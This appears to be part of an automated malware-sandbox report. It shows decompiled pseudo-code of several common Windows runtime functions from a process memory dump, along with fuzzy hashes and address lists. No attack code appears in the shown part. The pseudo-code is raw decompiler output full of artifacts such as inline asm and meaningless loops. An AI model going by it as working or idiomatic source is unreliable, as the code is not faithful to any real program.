0x033d3e20
0x033d3e20
0x033d3e35
0x00000000
0x033d3de9
0x033d3de9
0x033d3de9
0x033d3dee
0x033d3dfd
0x033d3dff
0x033d3e02
0x033d3e05
0x033d3e05
0x00000000
0x033d3df0
0x033d3de7
0x0340e78f
0x0340e794
0x033d3d79
0x033d3d84
0x033d3d89
0x033d3d8e
0x00000000
0x0340e7a4
0x033d3d96
0x033d3d9a
0x00000000
0x033d3d9a
0x00000000
0x0340e794
0x033d3d6e
0x033d3d73
0x00000000
0x0340e7b5
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbdd2208069e37927698e4abed2e2d8aba7aaaca9d7eaba99aebbd9f3b25bde1
Instruction ID: f768b688b8d11103b6b61edea1e08391b383305ef0f8a885a53a54070b7693b8
Opcode Fuzzy Hash: bbdd2208069e37927698e4abed2e2d8aba7aaaca9d7eaba99aebbd9f3b25bde1
Instruction Fuzzy Hash: 4A31A37BA05614DBC724CF29E881A6BB7E9EF45720709847AE445CB7A4E634DC40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 033BC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E033BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E033B7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03468D34(_v8, _t80);
					}
					E033B2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E033AFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03468833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E033AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E033DB180();
						if(_a4 != 0) {
							E033B2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E033BBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E033BBB2D(_t16, _t15);
						E033BB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E033AFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E033AFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E033AFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x033bc18d
0x033bc18f
0x033bc191
0x033bc19b
0x033bc1a0
0x033bc1d4
0x033bc1de
0x03402d6e
0x033bc1e4
0x033bc1e4
0x033bc1e4
0x033bc1ec
0x03402d7d
0x03402d7d
0x033bc1f3
0x033bc1ff
0x03402d88
0x03402d8d
0x03402d94
0x03402d94
0x03402d9f
0x03402da4
0x03402dab
0x03402db0
0x03402db2
0x03402db3
0x03402db4
0x03402dbc
0x03402dc3
0x03402dc3
0x033bc205
0x033bc205
0x033bc208
0x033bc20e
0x033bc211
0x033bc216
0x033bc219
0x033bc21f
0x033bc222
0x033bc22c
0x033bc234
0x033bc23a
0x033bc23f
0x033bc245
0x033bc24b
0x033bc251
0x033bc25a
0x033bc276
0x033bc27d
0x033bc27d
0x033bc25c
0x033bc25c
0x00000000
0x033bc25e
0x033bc1a4
0x033bc1aa
0x033bc1b3
0x033bc265
0x033bc26c
0x033bc26c
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 7acd516436def51c4d9d6ca834cac3247f3d07a937d133bf7947405b4ef25146
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: F3310875A0164ABEDB14EBB4C8C0BEAF778BF42204F08815AD5589F741DB345A49C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 03417016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03417016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x348d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03416B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03416B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E033B7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E033D9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E033DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L033B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03417016
0x0341701e
0x0341702b
0x03417033
0x03417037
0x0341703c
0x0341703e
0x03417041
0x03417045
0x0341704a
0x03417050
0x03417055
0x0341705a
0x03417062
0x03417062
0x0341705a
0x03417064
0x03417064
0x03417067
0x03417071
0x03417096
0x0341709b
0x034170a2
0x034170a6
0x034170a7
0x034170ad
0x034170b3
0x034170b6
0x034170bb
0x034170c3
0x034170c3
0x034170c6
0x034170cd
0x034170dd
0x034170e0
0x034170e2
0x034170e2
0x034170ee
0x03417101
0x034170f0
0x034170f9
0x034170f9
0x0341710a
0x0341710e
0x03417112
0x03417117
0x03417118
0x03417118
0x034170bb
0x0341711d
0x03417123
0x03417131
0x03417131
0x03417136
0x0341713d
0x0341713e
0x0341713f
0x0341714a
0x0341714a
0x03417084
0x03417088
0x00000000
0x0341708e
0x0341708e
0x03417092
0x00000000
0x03417092

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9635c4ef938ecfa40199e4cf9526f825e9350e7f8f531f7766d2aaf7f022cb
Instruction ID: 1c24976c099fe2058619676dd10690463e9f22227506057ee731faf9a598191c
Opcode Fuzzy Hash: 2e9635c4ef938ecfa40199e4cf9526f825e9350e7f8f531f7766d2aaf7f022cb
Instruction Fuzzy Hash: 36319376604B519FC320DF28C980A6BB7E5BF88700F054A2EF9959B791E730E914C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 033D8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E033D8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x348d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E033C4E70(0x34886e4, 0x33d9490, 0, 0);
					if( *0x34853e8 > 5 && E033D8F33(0x34853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x34853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x34853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x337bc46;
						_t48 = E03417B9C(0x34853e8, 0x337bc46, _t67, 0x34853e8, _t70,  &_v140);
					}
				}
				return E033DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x033d8ec7
0x033d8ed9
0x033d8edc
0x033d8ee6
0x033d8ee9
0x033d8eee
0x033d8efc
0x033d8f08
0x03411349
0x03411353
0x0341135d
0x03411366
0x0341136f
0x03411375
0x0341137c
0x03411385
0x03411390
0x03411391
0x0341139c
0x0341139d
0x034113a6
0x034113ac
0x034113b2
0x034113b5
0x034113bc
0x034113bf
0x034113c2
0x034113c5
0x034113c8
0x034113cb
0x034113ce
0x034113d1
0x034113d4
0x034113d7
0x034113da
0x034113dd
0x034113e0
0x034113e3
0x034113e6
0x034113e9
0x034113f6
0x03411400
0x03411400
0x033d8f08
0x033d8f32

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bbefe0962049ce5674afe51fe82eb33638951a8a965c546cb8ac979eb2576ae
Instruction ID: 1183380d2d020ae5cdf0e9ec5cf77e8c0326b1bd6db12005201fa784979ce30e
Opcode Fuzzy Hash: 2bbefe0962049ce5674afe51fe82eb33638951a8a965c546cb8ac979eb2576ae
Instruction Fuzzy Hash: 4241A1B5D0031C9EDB20DFAAD980AADFBF8FB48710F5041AEE509AB640D7705A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 033CBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E033CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3486100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E033B2280(0xd, 0x1069f1a0);
				_t41 =  *0x34860f8; // 0x0
				if(_t41 != 0) {
					 *0x34860f8 =  *_t41;
					 *0x34860fc =  *0x34860fc + 0xffff;
				}
				E033AFFB0(_t41, 0x800, 0x1069f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x34860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L033B4620(0x3486100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3486100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x033cbc36
0x033cbc42
0x033cbc45
0x033cbc4a
0x033cbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x033cbc50
0x033cbc50
0x033cbc58
0x033cbc5a
0x033cbc60
0x00000000
0x00000000
0x0340a4f2
0x0340a4f6
0x00000000
0x00000000
0x00000000
0x0340a4fc
0x033cbc79
0x033cbc7e
0x033cbc86
0x033cbd16
0x033cbd20
0x033cbd20
0x033cbc8d
0x033cbc94
0x033cbcbd
0x033cbcca
0x033cbccb
0x033cbccc
0x033cbccd
0x033cbcce
0x033cbcd4
0x033cbcea
0x033cbcee
0x033cbcf2
0x033cbd00
0x033cbd04
0x00000000
0x033cbc96
0x033cbcab
0x033cbcaf
0x033cbd2c
0x033cbd2c
0x033cbd09
0x00000000
0x033cbd09
0x033cbcb1
0x033cbcb5
0x033cbcbb
0x00000000
0x00000000
0x00000000
0x033cbcbb

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca36316f359005b66cc04718609eb4bfa902e91b5cbe77d3cce4d5f8d5c7f0b
Instruction ID: 67dcbc9799ffc9dc1d09db8a7cf582c298fc309c368d2504281bcb8f3ba2e452
Opcode Fuzzy Hash: 6ca36316f359005b66cc04718609eb4bfa902e91b5cbe77d3cce4d5f8d5c7f0b
Instruction Fuzzy Hash: 17310136A206959BCB41EF58D8C17AAB3B8EF09310F05807DEE44EF245EB78DD058B94

Uniqueness

Uniqueness Score: -1.00%

Function 03399100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03399100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x346f6e8);
				E033ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E034688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E033ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x34886c0; // 0x5207b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x34886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E033B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E034688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E033DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x348b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x34884c0;
										if(_t69 >=  *0x34884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03469063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0339922A(_t82);
							_t53 = E033B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03468B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x34886c0; // 0x5207b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x34886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x34886bc;
										_t72 = 0x34886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03399240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x34886c4;
									_t72 = 0x34886c0;
									L18:
									E033C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x03399100
0x03399100
0x03399100
0x03399100
0x03399102
0x03399107
0x0339910c
0x03399110
0x03399115
0x03399136
0x03399143
0x033f37e4
0x033f37e4
0x03399149
0x0339914e
0x0339914e
0x03399117
0x0339911d
0x00000000
0x00000000
0x0339911f
0x03399125
0x00000000
0x03399151
0x03399158
0x0339915d
0x03399161
0x03399168
0x033f3715
0x00000000
0x0339916e
0x0339916e
0x03399175
0x03399177
0x0339917e
0x0339917f
0x03399182
0x03399182
0x03399187
0x03399187
0x0339918a
0x0339918d
0x0339918f
0x03399192
0x03399195
0x03399198
0x03399198
0x03399198
0x0339919a
0x00000000
0x00000000
0x033f371f
0x033f3721
0x033f3727
0x033f372f
0x033f3733
0x033f3735
0x033f3738
0x033f373b
0x033f373d
0x033f3740
0x00000000
0x00000000
0x033f3746
0x033f3749
0x00000000
0x00000000
0x033f374f
0x033f3751
0x00000000
0x00000000
0x033f3757
0x033f3759
0x033f375c
0x033f375c
0x033f375e
0x033f375e
0x033f3761
0x033f3764
0x00000000
0x00000000
0x033f3766
0x033f3768
0x033f37a3
0x033f37a3
0x033f37a5
0x033f37a7
0x033f37ad
0x033f37b0
0x033f37b2
0x033f37bc
0x033f37c2
0x033f37c2
0x033f37b2
0x03399187
0x03399187
0x0339918a
0x0339918d
0x0339918f
0x03399192
0x03399195
0x00000000
0x03399195
0x00000000
0x03399187
0x033f376a
0x033f376a
0x033f376c
0x033f376c
0x033f376f
0x033f3775
0x00000000
0x00000000
0x033f3777
0x033f3779
0x00000000
0x00000000
0x033f3782
0x033f3787
0x033f3789
0x033f3790
0x033f3790
0x033f378b
0x033f378b
0x033f378b
0x033f3792
0x033f3795
0x033f3795
0x033f3798
0x033f3798
0x033f379b
0x033f379b
0x033991a3
0x033991a9
0x033991b0
0x033991b4
0x033991b4
0x033991bb
0x033991c0
0x033991c5
0x033991c7
0x033f37da
0x033991cd
0x033991cd
0x033991cd
0x033991d2
0x033991d5
0x03399239
0x03399239
0x033991d7
0x033991db
0x033991e1
0x033991e7
0x033991fd
0x03399203
0x0339921e
0x03399223
0x00000000
0x03399223
0x03399205
0x03399208
0x0339920c
0x03399214
0x03399214
0x033991e9
0x033991e9
0x033991ee
0x033991f3
0x033991f3
0x033991f3
0x033991e7
0x00000000
0x033991db
0x03399187
0x03399168

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6269efd4cfb24b6d9c0d8dda016df26ef1cc06daf268c3008a69e6bc7181e37
Instruction ID: 7c1bcae85625435a90e22eb831164c9944cb3a02d011b027ee0fad517486a2b3
Opcode Fuzzy Hash: c6269efd4cfb24b6d9c0d8dda016df26ef1cc06daf268c3008a69e6bc7181e37
Instruction Fuzzy Hash: E7316079A01289DFEF25DF68C8C87ADB7B5BB88350F58819FD4056B251C334A980CB56

Uniqueness

Uniqueness Score: -1.00%

Function 033B0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E033B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x348d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E033C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E033DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03468A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E033C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x348b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x033b0055
0x033b005d
0x033b0062
0x033b006c
0x033b006f
0x033b0074
0x033b007a
0x033b007a
0x033b0080
0x033b0080
0x033b0087
0x033b008d
0x033b008f
0x033b0093
0x033b0095
0x033b009b
0x033b00f8
0x033b00fb
0x033b00fc
0x033b00ff
0x033b0108
0x033b0108
0x033b00a2
0x033b00a6
0x033b00b3
0x033b00bc
0x033b00c5
0x033b00ca
0x033fc01e
0x00000000
0x00000000
0x033fc02d
0x033b00d5
0x033b00d9
0x033fc03d
0x033fc046
0x033fc046
0x033b00df
0x033b00e2
0x033b00ea
0x033b00ef
0x033b00f2
0x033b00f6
0x033b0111
0x033b0117
0x033b0117
0x00000000
0x033b00f6
0x033b00d0
0x033b00d0
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5020f5bc6040faed77fc6c52155a94f0ea665c0562d3412bf64e249d33332ca
